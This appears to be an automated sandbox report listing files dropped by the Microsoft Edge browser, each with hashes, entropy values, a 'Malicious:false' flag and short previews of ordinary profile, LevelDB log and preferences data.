                                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8720
                                                                                                                                                                            Entropy (8bit):0.21767183608283716
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:c/lD/ntFlljq7A/mhWJFuQ3yy7IOWUYrn4/dweytllrE9SFcTp4AGbNCV9RUIL:0Dk75fOOrn4/d0Xi99pEYZ
                                                                                                                                                                            MD5:7B44E60132EFEC3C6C928AA4B427AB09
                                                                                                                                                                            SHA1:8D427700E37624ABCD5A8D1F9C2E1CE730CC9BBB
                                                                                                                                                                            SHA-256:E222D39E8CEA5FC99428628B1588636301BF9636015693E7DC81814BFDDC20AE
                                                                                                                                                                            SHA-512:9D64795B896B0B3FDA476649EF1FD1746043FD2F1FD8A9124D7DE2099D6AF7AAEB62818E9528011EA12019173D04DDDFD3AA72860C54AF782984F19F207DA0A4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.............ue....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):408
                                                                                                                                                                            Entropy (8bit):5.2505178400540204
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7MrAVv4Yeb8rcHEZrELFUt8OtAg/+OtAI5LYeb8rcHEZrEZSJ:7MrA54Yeb8nZrExg8OtAwtASLYeb8nZR
                                                                                                                                                                            MD5:B7A9FD6A4600AA081644A5169FCE0BF5
                                                                                                                                                                            SHA1:573A54614671D930B11355D88F667AE505435C5B
                                                                                                                                                                            SHA-256:EEAF54066B599575FE9B567CD6A270995A52C448292F05DC75F3FAB93007FC27
                                                                                                                                                                            SHA-512:EB29B6D876AB124A7B0FA84ED81114B3818963F1CAD6E23C27AEB46037AE1A2CFB8EF1A34C4656FCE99B8523FC9AA6CC256983BE25BC73F5477E044C6378A211
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:41.305 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/11-03:39:41.306 12b4 Recovering log #3.2024/12/11-03:39:41.306 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):408
                                                                                                                                                                            Entropy (8bit):5.2505178400540204
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7MrAVv4Yeb8rcHEZrELFUt8OtAg/+OtAI5LYeb8rcHEZrEZSJ:7MrA54Yeb8nZrExg8OtAwtASLYeb8nZR
                                                                                                                                                                            MD5:B7A9FD6A4600AA081644A5169FCE0BF5
                                                                                                                                                                            SHA1:573A54614671D930B11355D88F667AE505435C5B
                                                                                                                                                                            SHA-256:EEAF54066B599575FE9B567CD6A270995A52C448292F05DC75F3FAB93007FC27
                                                                                                                                                                            SHA-512:EB29B6D876AB124A7B0FA84ED81114B3818963F1CAD6E23C27AEB46037AE1A2CFB8EF1A34C4656FCE99B8523FC9AA6CC256983BE25BC73F5477E044C6378A211
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:41.305 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/11-03:39:41.306 12b4 Recovering log #3.2024/12/11-03:39:41.306 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                            Entropy (8bit):5.124735820508631
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:71zLM+q2P923oH+Tcwt8a2jMGIFUt8O1HZZmw+O1nqMVkwO923oH+Tcwt8a2jMmd:7t4+v4Yeb8EFUt8OdZ/+OlV5LYeb8bJ
                                                                                                                                                                            MD5:1E07A6A05404000991E231DBE2E64BED
                                                                                                                                                                            SHA1:C0251A2C6142667DF19ADD5B9BB305622D38DCCB
                                                                                                                                                                            SHA-256:286B44AACBB5024F53058A58A2F4188FCA7064FF865E6D10003DCE89F83B9ADC
                                                                                                                                                                            SHA-512:66C1DC5139460D3C9F41F76E0F3B6FC7932E757D73B8ABF90A3A1AC03B974A231F1FA64B710CB28A157145A017E8ED61D00B49F3F57658FB7D1B031CA00F1916
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.551 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/11-03:39:39.552 10ac Recovering log #3.2024/12/11-03:39:39.554 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                            Entropy (8bit):5.124735820508631
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:71zLM+q2P923oH+Tcwt8a2jMGIFUt8O1HZZmw+O1nqMVkwO923oH+Tcwt8a2jMmd:7t4+v4Yeb8EFUt8OdZ/+OlV5LYeb8bJ
                                                                                                                                                                            MD5:1E07A6A05404000991E231DBE2E64BED
                                                                                                                                                                            SHA1:C0251A2C6142667DF19ADD5B9BB305622D38DCCB
                                                                                                                                                                            SHA-256:286B44AACBB5024F53058A58A2F4188FCA7064FF865E6D10003DCE89F83B9ADC
                                                                                                                                                                            SHA-512:66C1DC5139460D3C9F41F76E0F3B6FC7932E757D73B8ABF90A3A1AC03B974A231F1FA64B710CB28A157145A017E8ED61D00B49F3F57658FB7D1B031CA00F1916
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.551 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/11-03:39:39.552 10ac Recovering log #3.2024/12/11-03:39:39.554 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1419
                                                                                                                                                                            Entropy (8bit):5.3472674680284875
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YcFGJ/I3w6C1VdsOCyZVMdmRdsByZFRudFGRRdsYetZ6ma3yeesw6maPsQYhbxPf:YcgCgRsOvts4fcKsnrleeBkhYhbxo+
                                                                                                                                                                            MD5:98C3C225F0B77708EEF9CBBA81A60E4B
                                                                                                                                                                            SHA1:F80AC44C3A6823B58CB1DF504C3A342D0CBEB619
                                                                                                                                                                            SHA-256:E7CC67229AFCEFC5EED85006BF646FEAF14890EFBCED65BE3CECE3317E6DB650
                                                                                                                                                                            SHA-512:6F49079BB8287384F685A41CA9071F0A8B324CB5EB66EFAEC4C205DD8A5A6CCDF725DDA35363A1BA6D02515F3976225447E32484E223AB5F993A8A77DC52F9F2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380971983440446","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380971986371686","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378473609935157","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1419
                                                                                                                                                                            Entropy (8bit):5.3472674680284875
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YcFGJ/I3w6C1VdsOCyZVMdmRdsByZFRudFGRRdsYetZ6ma3yeesw6maPsQYhbxPf:YcgCgRsOvts4fcKsnrleeBkhYhbxo+
                                                                                                                                                                            MD5:98C3C225F0B77708EEF9CBBA81A60E4B
                                                                                                                                                                            SHA1:F80AC44C3A6823B58CB1DF504C3A342D0CBEB619
                                                                                                                                                                            SHA-256:E7CC67229AFCEFC5EED85006BF646FEAF14890EFBCED65BE3CECE3317E6DB650
                                                                                                                                                                            SHA-512:6F49079BB8287384F685A41CA9071F0A8B324CB5EB66EFAEC4C205DD8A5A6CCDF725DDA35363A1BA6D02515F3976225447E32484E223AB5F993A8A77DC52F9F2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380971983440446","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380971986371686","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378473609935157","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                            Entropy (8bit):5.567883867304443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7sSWPMOfKd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwDbpttuH:MhD7sSWPMOfKdu1jaCrnLDntA
                                                                                                                                                                            MD5:C0C4E0A053D200A0666279081CE6D109
                                                                                                                                                                            SHA1:03F5A6591FC16A5EB3893A2411427B4FA43A254C
                                                                                                                                                                            SHA-256:67BEBB8805E8C681BE818BB528218113F63624340704878EB0AAA8CB8F6C10EB
